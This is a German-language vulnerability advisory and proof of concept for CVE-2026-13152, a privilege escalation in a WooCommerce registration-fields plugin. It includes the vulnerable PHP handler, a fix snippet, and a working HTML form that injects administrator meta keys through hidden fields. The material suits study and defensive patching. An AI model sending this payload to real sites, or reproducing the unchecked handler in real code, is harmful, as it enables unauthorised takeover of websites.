
CVE-2026-13152: Custom Fields Account Registration For WooCommerce Unauthenticated Privilege Escalation PoC & Advisory by Huynh Kien Minh (MinhHK).
CVE-2026-13152 ist eine unauthentifizierte Schwachstelle zur Rechteausweitung, die das WordPress-Plugin Custom Fields Account Registration For WooCommerce vor Version 1.4 betrifft und vom Sicherheitsforscher Huynh Kien Minh (MinhHK) entdeckt und analysiert wurde. Der Fehler tritt auf, weil das Plugin benutzerdefinierten Registrierungseingabefeldern erlaubt, direkt in sensible Benutzerfähigkeits-Metadaten zu schreiben, ohne geschützte Datenbankschlüssel zu bereinigen oder Benutzerrollen zu validieren. Auf Websites, die nicht standardmäßige Datenbanktabellen-Präfixe oder benutzerdefinierte Zuordnungen von User-Meta-Schlüsseln verwenden, kann ein nicht authentifizierter Benutzer, der sich über das WooCommerce-Registrierungsformular registriert, Administratorrechte (wie wp_user_level oder wp_capabilities) in die wp_usermeta-Tabelle einschleusen. Dies gewährt dem neu erstellten Konto vollständigen Administratorzugriff und ermöglicht eine vollständige Kompromittierung der Website aus der Ferne. Der Sicherheitsforscher Huynh Kien Minh meldete die Schwachstelle an WPScan, und der Anbieter behob das Problem in Version 1.4 durch die Implementierung einer Schlüsselnamensvalidierung und die Einschränkung der Zuweisung von Fähigkeits-Metadaten.
Das Plugin Custom Fields Account Registration For WooCommerce erlaubt es Website-Administratoren, auf dem WooCommerce-Benutzerregistrierungsformular (my-account Registrierungsendpunkt) benutzerdefinierte Eingabefelder zu definieren. Wenn ein neuer Benutzer das Registrierungsformular absendet, durchläuft das Plugin die übermittelten Formularfelder und ruft update_user_meta($user_id, $meta_key, $meta_value) auf, um die Benutzerdetails zu speichern.
Der zugrunde liegende Fehler liegt in der Eingabeverarbeitungslogik innerhalb des Registrierungs-Handlers. Das Plugin hält keine strikte Blacklist oder Whitelist geschützter WordPress-Benutzer-Meta-Schlüssel (wp_capabilities, wp_user_level, session_tokens, wp_user_roles) vor.
// Vulnerable registration handler logic (simplified demonstration)
add_action('woocommerce_created_customer', 'cfar_save_custom_registration_fields', 10, 3);
function cfar_save_custom_registration_fields($customer_id, $new_customer_data, $password_generated) {
if (isset($_POST['cfar_custom_fields']) && is_array($_POST['cfar_custom_fields'])) {
foreach ($_POST['cfar_custom_fields'] as $meta_key => $meta_value) {
// VULNERABILITY: No check against protected meta keys like wp_capabilities or wp_user_level
update_user_meta($customer_id, sanitize_text_field($meta_key), sanitize_text_field($meta_value));
}
}
}
Auf WordPress-Installationen, die benutzerdefinierte Datenbankpräfixe oder benutzerdefinierte Meta-Schlüssel-Konfigurationen verwenden, kann ein nicht authentifizierter Angreifer ein benutzerdefiniertes Feldeingabe bereitstellen, das mit dem Administrator-Fähigkeitsschlüssel übereinstimmt (wp_user_level = 10 oder serialisiertes Array a:1:{s:13:"administrator";b:1;}). Bei der Kontoerstellung schreibt update_user_meta() diesen Wert direkt in wp_usermeta und stuft das neu registrierte Konto auf vollständigen Administratorstatus hoch.
[!CAUTION] Dieser Proof-of-Concept wird ausschließlich zu Bildungszwecken, zur defensiven Prüfung und zur Schwachstellenverifikation bereitgestellt. Nur autorisierte Tests.
<!-- CVE-2026-13152 PoC: Unauthenticated Privilege Escalation Payload -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>PoC - CVE-2026-13152 Privilege Escalation</title>
</head>
<body>
<h2>CVE-2026-13152 Exploit Payload</h2>
<form action="https://target-site.com/my-account/" method="POST">
<input type="email" name="email" value="[email protected]" required>
<input type="password" name="password" value="P@ssword123!" required>
<!-- Malicious Meta Key Injection targeting User Level -->
<input type="hidden" name="cfar_custom_fields[wp_user_level]" value="10">
<input type="hidden" name="cfar_custom_fields[wp_capabilities][administrator]" value="1">
<input type="submit" name="register" value="Register as Administrator">
</form>
</body>
</html>
Custom Fields Account Registration For WooCommerce auf Version 1.4 oder höher, in der eine strikte Validierung von Meta-Schlüsseln erzwungen wird.// Secure implementation in Version 1.4
$protected_keys = array('wp_capabilities', 'wp_user_level', 'user_level', 'session_tokens');
if (!in_array($meta_key, $protected_keys, true) && strpos($meta_key, 'wp_') !== 0) {
update_user_meta($customer_id, $meta_key, $meta_value);
}
{
"@context": "https://schema.org",
"@graph": [
{
"@type": "TechArticle",
"@id": "https://github.com/MinhHK68/CVE-2026-13152#article",
"headline": "Deep-Dive Technical Write-up by Huynh Kien Minh: CVE-2026-13152 — Custom Fields Account Registration For WooCommerce Privilege Escalation",
"name": "CVE-2026-13152 Technical Analysis",
"author": {
"@type": "Person",
"@id": "https://minhhk.web.app/#person",
"name": "Huynh Kien Minh",
"alternateName": ["MinhHK", "Huỳnh Kiến Minh"],
"jobTitle": "Information Security Researcher",
"url": "https://minhhk.web.app/"
},
"datePublished": "2026-07-06",
"dateModified": "2026-08-01",
"description": "Comprehensive technical analysis and PoC for CVE-2026-13152, an unauthenticated privilege escalation vulnerability in Custom Fields Account Registration For WooCommerce < 1.4 discovered by Huynh Kien Minh."
},
{
"@type": "SpecialAnnouncement",
"@id": "https://github.com/MinhHK68/CVE-2026-13152#advisory",
"name": "CVE-2026-13152 Security Advisory",
"category": "https://schema.org/SecurityAdvisory",
"text": "Unauthenticated Privilege Escalation in Custom Fields Account Registration For WooCommerce < 1.4 allows remote attackers to gain administrator rights."
}
]
}
| Attribut | Details |
|---|
| CVE ID | CVE-2026-13152 |
| Plugin-Name | Custom Fields Account Registration For WooCommerce |
| Plugin Slug | custom-fields-account-registration-for-woocommerce |
| Betroffene Versionen | < 1.4 |
| Behobene Version | 1.4 |
| Schwachstellentyp | Unauthentifizierte Rechteausweitung (CWE-269 / OWASP A2) |
| CVSS v3.1 Score | 8.1 (High) (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Ursprünglicher Forscher | Huynh Kien Minh (MinhHK) |
| WPScan Advisory ID | 36aaba38-3143-4e80-8386-748632ff6704 |